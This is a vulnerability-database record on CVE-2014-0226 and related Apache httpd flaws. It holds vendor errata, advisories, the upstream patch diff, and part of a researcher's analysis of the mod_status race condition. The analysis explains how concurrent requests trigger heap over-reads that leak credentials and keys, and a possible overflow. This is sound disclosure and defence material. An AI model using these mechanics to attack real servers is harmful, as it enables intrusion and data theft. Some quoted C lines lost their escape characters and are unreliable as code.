href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6438\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6438</a>>\n * CVE-2014-0226\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0226\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0226</a>>\n * CVE-2014-0231\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0231\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0231</a>>\n\n", "edition": 1, "modified": "2014-09-02T19:04:20", "published": "2014-09-02T19:04:20", "id": "SUSE-SU-2014:1080-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-09/msg00000.html", "type": "suse", "title": "Security update for apache2 (important)", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-04T11:56:35", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0231", "CVE-2013-1896", "CVE-2014-0098", "CVE-2013-1862", "CVE-2013-6438", "CVE-2014-0226"], "description": "This apache2 update fixes the following security issues:\n\n * log_cookie mod_log_config.c remote denial of service (CVE-2014-0098,\n bnc#869106)\n * mod_dav denial of service (CVE-2013-6438, bnc#869105)\n * mod_cgid denial of service (CVE-2014-0231, bnc#887768)\n * mod_status heap-based buffer overflow (CVE-2014-0226, bnc#887765)\n * mod_rewrite: escape logdata to avoid terminal escapes\n (CVE-2013-1862, bnc#829057)\n * mod_dav: segfault in merge request (CVE-2013-1896, bnc#829056)\n\n Security Issues:\n\n * CVE-2014-0098\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0098\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0098</a>>\n * CVE-2013-6438\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6438\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6438</a>>\n * CVE-2014-0226\n <<a rel=\"nofollow\" 
href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0226\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0226</a>>\n * CVE-2014-0231\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0231\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0231</a>>\n * CVE-2013-1862\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1862\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1862</a>>\n * CVE-2013-1896\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1896\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1896</a>>\n\n\n", "edition": 1, "modified": "2014-09-02T21:04:17", "published": "2014-09-02T21:04:17", "id": "SUSE-SU-2014:1082-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-09/msg00002.html", "title": "Security update for apache2 (important)", "type": "suse", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:37:47", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0231", "CVE-2013-4352", "CVE-2014-0118", "CVE-2014-0117", "CVE-2014-0226"], "description": "[2.4.6-18.0.1.el7_0]\n- replace index.html with Oracle's index page oracle_index.html\n[2.4.6-18]\n- mod_cgid: add security fix for CVE-2014-0231 (#1120607)\n- mod_proxy: add security fix for CVE-2014-0117 (#1120607)\n- mod_deflate: add security fix for CVE-2014-0118 (#1120607)\n- mod_status: add security fix for CVE-2014-0226 (#1120607)\n- mod_cache: add security fix for CVE-2013-4352 (#1120607)", "edition": 4, "modified": "2014-07-23T00:00:00", "published": "2014-07-23T00:00:00", "id": "ELSA-2014-0921", "href": "http://linux.oracle.com/errata/ELSA-2014-0921.html", "title": "httpd security update", "type": "oraclelinux", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:36:11", "bulletinFamily": "unix", "cvelist": 
["CVE-2014-0231", "CVE-2013-4352", "CVE-2014-3583", "CVE-2013-5704", "CVE-2014-0118", "CVE-2014-3581", "CVE-2014-0117", "CVE-2014-0226"], "description": "[2.4.6-22.0.1.el6]\n- remove enable-tlsv1x-thunks to fit openssl 1.x api\n- replace index.html with Oracle's index page oracle_index.html\n- update vstring in specfile\n[2.4.6-22]\n- Remove mod_proxy_fcgi fix for heap-based buffer overflow,\n httpd-2.4.6 is not affected (CVE-2014-3583)\n[2.4.6-21]\n- mod_proxy_wstunnel: Fix the use of SSL with the 'wss:' scheme (#1141950)\n[2.4.6-20]\n- core: fix bypassing of mod_headers rules via chunked requests (CVE-2013-5704)\n- mod_cache: fix NULL pointer dereference on empty Content-Type (CVE-2014-3581)\n- mod_proxy_fcgi: fix heap-based buffer overflow (CVE-2014-3583)\n[2.4.6-19]\n- mod_cgid: add security fix for CVE-2014-0231\n- mod_proxy: add security fix for CVE-2014-0117\n- mod_deflate: add security fix for CVE-2014-0118\n- mod_status: add security fix for CVE-2014-0226\n- mod_cache: add security fix for CVE-2013-4352", "edition": 4, "modified": "2016-02-04T00:00:00", "published": "2016-02-04T00:00:00", "id": "ELSA-2014-1972", "href": "http://linux.oracle.com/errata/ELSA-2014-1972.html", "title": "httpd24-httpd security and bug fix update", "type": "oraclelinux", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "httpd": [{"lastseen": "2020-12-24T14:26:50", "bulletinFamily": "software", "cvelist": ["CVE-2014-0118"], "description": "\nA resource consumption flaw was found in mod_deflate. If request body\ndecompression was configured (using the \"DEFLATE\" input filter), a\nremote attacker could cause the server to consume significant memory \nand/or CPU resources. 
The use of request body decompression is not a common\nconfiguration.\n", "edition": 5, "modified": "2014-07-14T00:00:00", "published": "2014-02-19T00:00:00", "id": "HTTPD:4979B5C50BFE930EB922EF4650B13100", "href": "https://httpd.apache.org/security_report.html", "title": "Apache Httpd < None: mod_deflate denial of service", "type": "httpd", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2016-09-26T21:39:37", "bulletinFamily": "software", "cvelist": ["CVE-2014-0118"], "edition": 1, "description": "\nA resource consumption flaw was found in mod_deflate. If request body\ndecompression was configured (using the \"DEFLATE\" input filter), a\nremote attacker could cause the server to consume significant memory \nand/or CPU resources. The use of request body decompression is not a common\nconfiguration.\n", "modified": "2014-09-03T00:00:00", "published": "2014-02-19T00:00:00", "id": "HTTPD:B59ABFE21648992992E0F3E6F9B79EC6", "href": "https://httpd.apache.org/security_report.html", "type": "httpd", "title": "Apache Httpd < 2.2.29: mod_deflate denial of service", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2016-09-26T21:39:37", "bulletinFamily": "software", "cvelist": ["CVE-2014-0118"], "edition": 1, "description": "\nA resource consumption flaw was found in mod_deflate. If request body\ndecompression was configured (using the \"DEFLATE\" input filter), a\nremote attacker could cause the server to consume significant memory \nand/or CPU resources. 
The use of request body decompression is not a common\nconfiguration.\n", "modified": "2014-07-14T00:00:00", "published": "2014-02-19T00:00:00", "id": "HTTPD:A46DC391ADD17CB8CA52B09A7D4194CD", "href": "https://httpd.apache.org/security_report.html", "type": "httpd", "title": "Apache Httpd < 2.4.10: mod_deflate denial of service", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2016-09-26T21:39:37", "bulletinFamily": "software", "cvelist": ["CVE-2014-0226"], "edition": 1, "description": "\nA race condition was found in mod_status. An attacker able to access\na public server status page on a server using a threaded MPM could send a\ncarefully crafted request which could lead to a heap buffer overflow. Note\nthat it is not a default or recommended configuration to have a public\naccessible server status page.\n", "modified": "2014-09-03T00:00:00", "published": "2014-05-30T00:00:00", "id": "HTTPD:E3EA50E892151D4F57BF7B9A57DDA94D", "href": "https://httpd.apache.org/security_report.html", "type": "httpd", "title": "Apache Httpd < 2.2.29: mod_status buffer overflow", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-26T21:39:37", "bulletinFamily": "software", "cvelist": ["CVE-2014-0226"], "edition": 1, "description": "\nA race condition was found in mod_status. An attacker able to access\na public server status page on a server using a threaded MPM could send a\ncarefully crafted request which could lead to a heap buffer overflow. 
Note\nthat it is not a default or recommended configuration to have a public\naccessible server status page.\n", "modified": "2014-07-14T00:00:00", "published": "2014-05-30T00:00:00", "id": "HTTPD:6F38DA367086990E883C7F7B4D5E5DBB", "href": "https://httpd.apache.org/security_report.html", "type": "httpd", "title": "Apache Httpd < 2.4.10: mod_status buffer overflow", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2020-12-24T14:26:50", "bulletinFamily": "software", "cvelist": ["CVE-2014-0226"], "description": "\nA race condition was found in mod_status. An attacker able to access\na public server status page on a server using a threaded MPM could send a\ncarefully crafted request which could lead to a heap buffer overflow. Note\nthat it is not a default or recommended configuration to have a public\naccessible server status page.\n", "edition": 5, "modified": "2014-07-14T00:00:00", "published": "2014-05-30T00:00:00", "id": "HTTPD:21BDE4F434D5052BD4CA91E0C09D07D2", "href": "https://httpd.apache.org/security_report.html", "title": "Apache Httpd < None: mod_status buffer overflow", "type": "httpd", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "zdi": [{"lastseen": "2020-06-22T11:41:59", "bulletinFamily": "info", "cvelist": ["CVE-2014-0226"], "edition": 3, "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apache HTTPD server. Authentication is not required to exploit this vulnerability. The specific flaw exists within the updating of mod_status. A race condition in mod_status allows an attacker to disclose information or corrupt memory with several requests to endpoints with handler server-status and other endpoints. 
By abusing this flaw, an attacker can possibly disclose credentials or leverage this situation to achieve remote code execution.", "modified": "2014-06-22T00:00:00", "published": "2014-07-16T00:00:00", "href": "https://www.zerodayinitiative.com/advisories/ZDI-14-236/", "id": "ZDI-14-236", "title": "Apache httpd mod_status Heap Buffer Overflow Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2018-02-06T23:12:29", "edition": 2, "description": "Exploit for linux platform in category dos / poc", "published": "2014-07-20T00:00:00", "type": "zdt", "title": "Apache 2.4.7 httpd mod_status Heap Buffer Overflow Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0226"], "modified": "2014-07-20T00:00:00", "id": "1337DAY-ID-22451", "href": "https://0day.today/exploit/description/22451", "sourceData": "URL: http://svn.apache.org/r1610499\r\nLog:\r\nMerge 1610491 from trunk:\r\n\r\nSECURITY (CVE-2014-0226): Fix a race condition in scoreboard handling,\r\nwhich could lead to a heap buffer overflow. 
Thanks to Marek Kroemeke\r\nworking with HP's Zero Day Initiative for reporting this.\r\n\r\n* include/scoreboard.h: Add ap_copy_scoreboard_worker.\r\n\r\n* server/scoreboard.c (ap_copy_scoreboard_worker): New function.\r\n\r\n* modules/generators/mod_status.c (status_handler): Use it.\r\n\r\n* modules/lua/lua_request.c (lua_ap_scoreboard_worker): Likewise.\r\n\r\nReviewed by: trawick, jorton, covener, jim\r\nSubmitted by: jorton, covener\r\n\r\nModified:\r\nhttpd/httpd/branches/2.4.x/ (props changed)\r\nhttpd/httpd/branches/2.4.x/CHANGES\r\nhttpd/httpd/branches/2.4.x/include/ap_mmn.h\r\nhttpd/httpd/branches/2.4.x/include/scoreboard.h\r\nhttpd/httpd/branches/2.4.x/modules/generators/mod_status.c\r\nhttpd/httpd/branches/2.4.x/modules/lua/lua_request.c\r\nhttpd/httpd/branches/2.4.x/server/scoreboard.c\r\n\r\nPropchange: httpd/httpd/branches/2.4.x/\r\n------------------------------------------------------------------------------\r\nMerged /httpd/httpd/trunk:r1610491\r\n\r\nModified: httpd/httpd/branches/2.4.x/CHANGES\r\nURL:\r\nhttp://svn.apache.org/viewvc/httpd/httpd/branches/2.4.x/CHANGES?rev=1610499&r1=1610498&r2=1610499&view=diff\r\n==============================================================================\r\n--- httpd/httpd/branches/2.4.x/CHANGES [utf-8] (original)\r\n+++ httpd/httpd/branches/2.4.x/CHANGES [utf-8] Mon Jul 14 19:55:04 2014\r\n@@ -2,6 +2,10 @@\r\n\r\nChanges with Apache 2.4.10\r\n\r\n+ *) SECURITY: CVE-2014-0226 (cve.mitre.org)\r\n+ Fix a race condition in scoreboard handling, which could lead to\r\n+ a heap buffer overflow. [Joe Orton]\r\n+\r\n*) mod_ssl: Extend the scope of SSLSessionCacheTimeout to sessions\r\nresumed by TLS session resumption (RFC 5077). 
[Rainer Jung]\r\n\r\n\r\nModified: httpd/httpd/branches/2.4.x/include/ap_mmn.h\r\nURL:\r\nhttp://svn.apache.org/viewvc/httpd/httpd/branches/2.4.x/include/ap_mmn.h?rev=1610499&r1=1610498&r2=1610499&v\r\niew=diff\r\n==============================================================================\r\n--- httpd/httpd/branches/2.4.x/include/ap_mmn.h (original)\r\n+++ httpd/httpd/branches/2.4.x/include/ap_mmn.h Mon Jul 14 19:55:04 2014\r\n@@ -431,6 +431,7 @@\r\n* 20120211.34 (2.4.10-dev) AP_DEFAULT_HANDLER_NAME/AP_IS_DEFAULT_HANDLER_NAME\r\n* 20120211.35 (2.4.10-dev) Add \"r\", \"must_rebind\", and last_backend_conn\r\nto util_ldap_connection_t\r\n+ * 20120211.36 (2.4.10-dev) Add ap_copy_scoreboard_worker()\r\n*/\r\n\r\n#define MODULE_MAGIC_COOKIE 0x41503234UL /* \"AP24\" */\r\n@@ -438,7 +439,7 @@\r\n#ifndef MODULE_MAGIC_NUMBER_MAJOR\r\n#define MODULE_MAGIC_NUMBER_MAJOR 20120211\r\n#endif\r\n-#define MODULE_MAGIC_NUMBER_MINOR 35 /* 0...n */\r\n+#define MODULE_MAGIC_NUMBER_MINOR 36 /* 0...n */\r\n\r\n/**\r\n* Determine if the server's current MODULE_MAGIC_NUMBER is at least a\r\n\r\nModified: httpd/httpd/branches/2.4.x/include/scoreboard.h\r\nURL:\r\nhttp://svn.apache.org/viewvc/httpd/httpd/branches/2.4.x/include/scoreboard.h?rev=1610499&r1=1610498&r2=1610499&a\r\nmp;view=diff\r\n==============================================================================\r\n--- httpd/httpd/branches/2.4.x/include/scoreboard.h (original)\r\n+++ httpd/httpd/branches/2.4.x/include/scoreboard.h Mon Jul 14 19:55:04 2014\r\n@@ -183,8 +183,25 @@ AP_DECLARE(int) ap_update_child_status_f\r\nAP_DECLARE(void) ap_time_process_request(ap_sb_handle_t *sbh, int status);\r\n\r\nAP_DECLARE(worker_score *) ap_get_scoreboard_worker(ap_sb_handle_t *sbh);\r\n+\r\n+/** Return a pointer to the worker_score for a given child, thread pair.\r\n+ * @param child_num The child number.\r\n+ * @param thread_num The thread number.\r\n+ * @return A pointer to the worker_score structure.\r\n+ * @deprecated This function is 
deprecated, use ap_copy_scoreboard_worker instead. */\r\nAP_DECLARE(worker_score *) ap_get_scoreboard_worker_from_indexes(int child_num,\r\nint thread_num);\r\n+\r\n+/** Copy the contents of a worker scoreboard entry. The contents of\r\n+ * the worker_score structure are copied verbatim into the dest\r\n+ * structure.\r\n+ * @param dest Output parameter.\r\n+ * @param child_num The child number.\r\n+ * @param thread_num The thread number.\r\n+ */\r\n+AP_DECLARE(void) ap_copy_scoreboard_worker(worker_score *dest,\r\n+ int child_num, int thread_num);\r\n+\r\nAP_DECLARE(process_score *) ap_get_scoreboard_process(int x);\r\nAP_DECLARE(global_score *) ap_get_scoreboard_global(void);\r\n\r\n\r\nModified: httpd/httpd/branches/2.4.x/modules/generators/mod_status.c\r\nURL:\r\nhttp://svn.apache.org/viewvc/httpd/httpd/branches/2.4.x/modules/generators/mod_status.c?rev=1610499&r1=1610498&r\r\n2=1610499&view=diff\r\n==============================================================================\r\n--- httpd/httpd/branches/2.4.x/modules/generators/mod_status.c (original)\r\n+++ httpd/httpd/branches/2.4.x/modules/generators/mod_status.c Mon Jul 14 19:55:04 2014\r\n@@ -194,7 +194,7 @@ static int status_handler(request_rec *r\r\nlong req_time;\r\nint short_report;\r\nint no_table_report;\r\n- worker_score *ws_record;\r\n+ worker_score *ws_record = apr_palloc(r->pool, sizeof *ws_record);\r\nprocess_score *ps_record;\r\nchar *stat_buffer;\r\npid_t *pid_buffer, worker_pid;\r\n@@ -306,7 +306,7 @@ static int status_handler(request_rec *r\r\nfor (j = 0; j < thread_limit; ++j) {\r\nint indx = (i * thread_limit) + j;\r\n\r\n- ws_record = ap_get_scoreboard_worker_from_indexes(i, j);\r\n+ ap_copy_scoreboard_worker(ws_record, i, j);\r\nres = ws_record->status;\r\n\r\nif ((i >= max_servers || j >= threads_per_child)\r\n@@ -637,7 +637,7 @@ static int status_handler(request_rec *r\r\n\r\nfor (i = 0; i < server_limit; ++i) {\r\nfor (j = 0; j < thread_limit; ++j) {\r\n- ws_record = 
ap_get_scoreboard_worker_from_indexes(i, j);\r\n+ ap_copy_scoreboard_worker(ws_record, i, j);\r\n\r\nif (ws_record->access_count == 0 &&\r\n(ws_record->status == SERVER_READY ||\r\n\r\nModified: httpd/httpd/branches/2.4.x/modules/lua/lua_request.c\r\nURL:\r\nhttp://svn.apache.org/viewvc/httpd/httpd/branches/2.4.x/modules/lua/lua_request.c?rev=1610499&r1=1610498&r2=1610\r\n499&view=diff\r\n==============================================================================\r\n--- httpd/httpd/branches/2.4.x/modules/lua/lua_request.c (original)\r\n+++ httpd/httpd/branches/2.4.x/modules/lua/lua_request.c Mon Jul 14 19:55:04 2014\r\n@@ -1245,16 +1245,22 @@ static int lua_ap_scoreboard_process(lua\r\n*/\r\nstatic int lua_ap_scoreboard_worker(lua_State *L)\r\n{\r\n- int i,\r\n- j;\r\n- worker_score *ws_record;\r\n+ int i, j;\r\n+ worker_score *ws_record = NULL;\r\n+ request_rec *r = NULL;\r\n\r\nluaL_checktype(L, 1, LUA_TUSERDATA);\r\nluaL_checktype(L, 2, LUA_TNUMBER);\r\nluaL_checktype(L, 3, LUA_TNUMBER);\r\n+\r\n+ r = ap_lua_check_request_rec(L, 1);\r\n+ if (!r) return 0;\r\n+\r\ni = lua_tointeger(L, 2);\r\nj = lua_tointeger(L, 3);\r\n- ws_record = ap_get_scoreboard_worker_from_indexes(i, j);\r\n+ ws_record = apr_palloc(r->pool, sizeof *ws_record);\r\n+\r\n+ ap_copy_scoreboard_worker(ws_record, i, j);\r\nif (ws_record) {\r\nlua_newtable(L);\r\n\r\n\r\nModified: httpd/httpd/branches/2.4.x/server/scoreboard.c\r\nURL:\r\nhttp://svn.apache.org/viewvc/httpd/httpd/branches/2.4.x/server/scoreboard.c?rev=1610499&r1=1610498&r2=1610499&am\r\np;view=diff\r\n==============================================================================\r\n--- httpd/httpd/branches/2.4.x/server/scoreboard.c (original)\r\n+++ httpd/httpd/branches/2.4.x/server/scoreboard.c Mon Jul 14 19:55:04 2014\r\n@@ -579,6 +579,21 @@ AP_DECLARE(worker_score *) ap_get_scoreb\r\nsbh->thread_num);\r\n}\r\n\r\n+AP_DECLARE(void) ap_copy_scoreboard_worker(worker_score *dest,\r\n+ int child_num,\r\n+ int thread_num)\r\n+{\r\n+ 
worker_score *ws = ap_get_scoreboard_worker_from_indexes(child_num, thread_num);\r\n+\r\n+ memcpy(dest, ws, sizeof *ws);\r\n+\r\n+ /* For extra safety, NUL-terminate the strings returned, though it\r\n+ * should be true those last bytes are always zero anyway. */\r\n+ dest->client[sizeof(dest->client) - 1] = '\\0';\r\n+ dest->request[sizeof(dest->request) - 1] = '\\0';\r\n+ dest->vhost[sizeof(dest->vhost) - 1] = '\\0';\r\n+}\r\n+\r\nAP_DECLARE(process_score *) ap_get_scoreboard_process(int x)\r\n{\r\nif ((x < 0) || (x >= server_limit)) {\r\n\r\n\r\n-----------------------------------------------------------------------\r\nApache 2.4.7 mod_status Scoreboard Handling Race Condition\r\n-----------------------------------------------------------------------\r\n\r\n--[ 0. Sparse summary\r\nRace condition between updating httpd's \"scoreboard\" and mod_status,\r\nleading to several critical scenarios like heap buffer overflow with\r\nuser\r\nsupplied payload and leaking heap which can leak critical memory\r\ncontaining\r\nhtaccess credentials, ssl certificates private keys and so on.\r\n--[ 1. Prerequisites\r\n \r\nApache httpd compiled with MPM event or MPM worker.\r\nThe tested version was 2.4.7 compiled with:\r\n \r\n ./configure --enable-mods-shared=reallyall --with-included-apr\r\n \r\nThe tested mod_status configuration in httpd.conf was:\r\n SetHandler server-status\r\n ExtendedStatus On\r\n--[ 2. 
Race Condition\r\n \r\nFunction ap_escape_logitem in server/util.c looks as follows:\r\n \r\n 1908AP_DECLARE(char *) ap_escape_logitem(apr_pool_t *p, const char\r\n*str)\r\n 1909{\r\n 1910 char *ret;\r\n 1911 unsigned char *d;\r\n 1912 const unsigned char *s;\r\n 1913 apr_size_t length, escapes = 0;\r\n 1914\r\n 1915 if (!str) {\r\n 1916 return NULL;\r\n 1917 }\r\n 1918\r\n 1919 /* Compute how many characters need to be escaped */\r\n 1920 s = (const unsigned char *)str;\r\n 1921 for (; *s; ++s) {\r\n 1922 if (TEST_CHAR(*s, T_ESCAPE_LOGITEM)) {\r\n 1923 escapes++;\r\n 1924 }\r\n 1925 }\r\n 1926\r\n 1927 /* Compute the length of the input string, including NULL\r\n*/\r\n 1928 length = s - (const unsigned char *)str + 1;\r\n 1929\r\n 1930 /* Fast path: nothing to escape */\r\n 1931 if (escapes == 0) {\r\n 1932 return apr_pmemdup(p, str, length);\r\n 1933 }\r\n \r\nIn the for-loop between 1921 and 1925 lines function is computing the\r\nlength of\r\nsupplied str (almost like strlen, but additionally it counts special\r\ncharacters\r\nwhich need to be escaped). As comment in 1927 value says, function\r\ncomputes count\r\nof bytes to copy. If there's nothing to escape function uses\r\napr_pmemdup to duplicate\r\nthe str. In our single-threaded mind everything looks good, but tricky\r\npart starts\r\nwhen we introduce multi-threading. Apache in MPM mode runs workers as\r\nthreads, let's\r\nconsider the following scenario:\r\n \r\n 1) ap_escape_logitem(pool, \"\") is called\r\n 2) for-loop in 1921 line immediately escapes, because *s is in\r\nfirst loop run\r\n 3) malicious thread change memory under *s to another value\r\n(something which is not )\r\n 4) apr_pmemdup copies that change value to new string and returns\r\nit\r\n \r\nOutput from the ap_escape_logitem is considered to be a string, if\r\nscenario above would occur,\r\nthen returned string would not be zeroed at the end, which may be\r\nharmful. 
The mod_status\r\ncode looks as follows:\r\n \r\n 833 ap_rprintf(r, \"%s%s\"\r\n 834 \"%snn\",\r\n 835 ap_escape_html(r->pool,\r\n 836 \r\nws_record->client),\r\n 837 ap_escape_html(r->pool,\r\n 838 \r\nws_record->vhost),\r\n 839 ap_escape_html(r->pool,\r\n 840 \r\nap_escape_logitem(r->pool,\r\n 841 \r\nws_record->request)));\r\n \r\nThe relevant call to ap_escape_html() is at line 839 after the\r\nevaluation of ap_escape_logitem().\r\nThe first argument passed to the ap_escape_logitem() is in fact an apr\r\npool associated with\r\nthe HTTP request and defined in the request_rec structure.\r\n \r\nThis code is a part of a larger for-loop where code is iterating over\r\nworker_score structs which is\r\ndefined as follows:\r\n \r\n 90struct worker_score {\r\n 91#if APR_HAS_THREADS\r\n 92 apr_os_thread_t tid;\r\n 93#endif\r\n 94 int thread_num;\r\n 95 /* With some MPMs (e.g., worker), a worker_score can\r\nrepresent\r\n 96 * a thread in a terminating process which is no longer\r\n 97 * represented by the corresponding process_score. These\r\nMPMs\r\n 98 * should set pid and generation fields in the worker_score.\r\n 99 */\r\n 100 pid_t pid;\r\n 101 ap_generation_t generation;\r\n 102 unsigned char status;\r\n 103 unsigned short conn_count;\r\n 104 apr_off_t conn_bytes;\r\n 105 unsigned long access_count;\r\n 106 apr_off_t bytes_served;\r\n 107 unsigned long my_access_count;\r\n 108 apr_off_t my_bytes_served;\r\n 109 apr_time_t start_time;\r\n 110 apr_time_t stop_time;\r\n 111 apr_time_t last_used;\r\n 112#ifdef HAVE_TIMES\r\n 113 struct tms times;\r\n 114#endif\r\n 115 char client[40]; /* Keep 'em small... but large\r\nenough to hold an IPv6 address */\r\n 116 char request[64]; /* We just want an idea... */\r\n 117 char vhost[32]; /* What virtual host is being\r\naccessed? 
*/\r\n 118};\r\n \r\nThe 'request' field in a worker_score structure is particularly\r\ninteresting - this field can be changed inside\r\nthe copy_request function, which is called by the\r\nupdate_child_status_internal. This change may occur when the\r\nmod_status is iterating over the workers at the same time the\r\nap_escape_logitem is called within a different\r\nthread, leading to a race condition. We can trigger this exact\r\nscenario in order to return a string without a\r\ntrailing . This can be achived by running two clients, one triggering\r\nthe mod_status handler and second\r\nsending random requests to the web server. Let's consider the\r\nfollowing example:\r\n \r\n 1) the mod_status iterates over workers invoking\r\nupdate_child_status_internal()\r\n 2) at some point for one worker mod_status calls\r\nap_escape_logitem(pool, ws_record->request)\r\n 3) let's asume that ws_record->request at the beginning is \"\"\r\nliterally at the first byte.\r\n 4) inside the ap_escape_logitem function the length of the\r\nws_record->request is computed, which is 1\r\n (an empty string consisting of )\r\n 5) another thread modifies ws_record->request (in fact it's called\r\nws->request in update_child_status_internal\r\n function but it's exactly the same location in memory) and puts\r\nthere i.e. \"GET / HTTP/1.0\"\r\n 6) the ap_pmemdup(pool, str, 1) in ap_escape_logitem copies the\r\nfirst one byte from \"GET / HTTP/1.0\" - \"G\" in\r\n that case and returns it. 
The ap_pmemdup looks as follows:\r\n \r\n 112APR_DECLARE(void *) apr_pmemdup(apr_pool_t *a, const void\r\n*m, apr_size_t n)\r\n 113{\r\n 114 void *res;\r\n 115\r\n 116 if (m == NULL)\r\n 117 return NULL;\r\n 118 res = apr_palloc(a, n);\r\n 119 memcpy(res, m, n);\r\n 120 return res;\r\n \r\n It allocates memory using apr_palloc function which returns\r\n\"ditry\" memory (note that apr_pcalloc overwrite\r\n allocated memory with NULs).\r\n \r\n So it's non-deterministic what's after the copied \"G\" byte.\r\nThere might be or might be not. For now let's\r\n assume that the memory allocated by apr_palloc was dirty\r\n(containing random bytes).\r\n 7) ap_escape_logitem returns \"G.....\" .junk. \"\"\r\n \r\nThe value from the example above is then pushed to the ap_escape_html2\r\nfunction which is also declared in util.c:\r\n \r\n 1860AP_DECLARE(char *) ap_escape_html2(apr_pool_t *p, const char\r\n*s, int toasc)\r\n 1861{\r\n 1862 int i, j;\r\n 1863 char *x;\r\n 1864\r\n 1865 /* first, count the number of extra characters */\r\n 1866 for (i = 0, j = 0; s[i] != ''; i++)\r\n 1867 if (s[i] == '')\r\n 1868 j += 3;\r\n 1869 else if (s[i] == '&')\r\n 1870 j += 4;\r\n 1871 else if (s[i] == '\"')\r\n 1872 j += 5;\r\n 1873 else if (toasc && !apr_isascii(s[i]))\r\n 1874 j += 5;\r\n 1875\r\n 1876 if (j == 0)\r\n 1877 return apr_pstrmemdup(p, s, i);\r\n 1878\r\n 1879 x = apr_palloc(p, i + j + 1);\r\n 1880 for (i = 0, j = 0; s[i] != ''; i++, j++)\r\n 1881 if (s[i] == '') {\r\n 1886 memcpy(&x[j], \">\", 4);\r\n 1887 j += 3;\r\n 1888 }\r\n 1889 else if (s[i] == '&') {\r\n 1890 memcpy(&x[j], \"&\", 5);\r\n 1891 j += 4;\r\n 1892 }\r\n 1893 else if (s[i] == '\"') {\r\n 1894 memcpy(&x[j], \"\"\", 6);\r\n 1895 j += 5;\r\n 1896 }\r\n 1897 else if (toasc && !apr_isascii(s[i])) {\r\n 1898 char *esc = apr_psprintf(p, \"&#%3.3d;\", (unsigned\r\nchar)s[i]);\r\n 1899 memcpy(&x[j], esc, 6);\r\n 1900 j += 5;\r\n 1901 }\r\n 1902 else\r\n 1903 x[j] = s[i];\r\n 1904\r\n 1905 x[j] = '';\r\n 1906 
return x;\r\n 1907}\r\n \r\nIf the string from the example above would be passed to this function\r\nwe should get the following code-flow:\r\n \r\n 1) in the for-loop started in line 1866 we count the length of\r\nescaped string\r\n 2) because 's' string contains junk (due to only one byte being\r\nallocated by the apr_palloc function),\r\n it may contain '>' character. Let's assume that this is our\r\ncase\r\n 3) after for-loop in 1866 line 'j' is greater than 0 (at least one\r\ns[i] equals '>' as assumed above\r\n 4) in the 1879 line memory for escaped 'd' string is allocated\r\n 5) for-loop started in line 1880 copies string 's' to the escaped\r\n'd' string BUT apr_palloc has allocated\r\n only one byte for 's'. Thus, for each i > 0 the loop reads\r\nrandom memory and copies that value\r\n to 'd' string. At this point it's possible to trigger an\r\ninformation leak vulnerability (see section 5).\r\n \r\nHowever the 's' string may overlap with 'd' i.e.:\r\n \r\n 's' is allocated under 0 with contents s = \"AAAAAAAA>\"\r\n 'd' is allocated under 8 then s[8] = d[0].\r\n \r\nIf that would be the case, then for-loop would run forever (s[i] never\r\nwould be since it was overwritten in the loop\r\nby non-zero). Forever... 
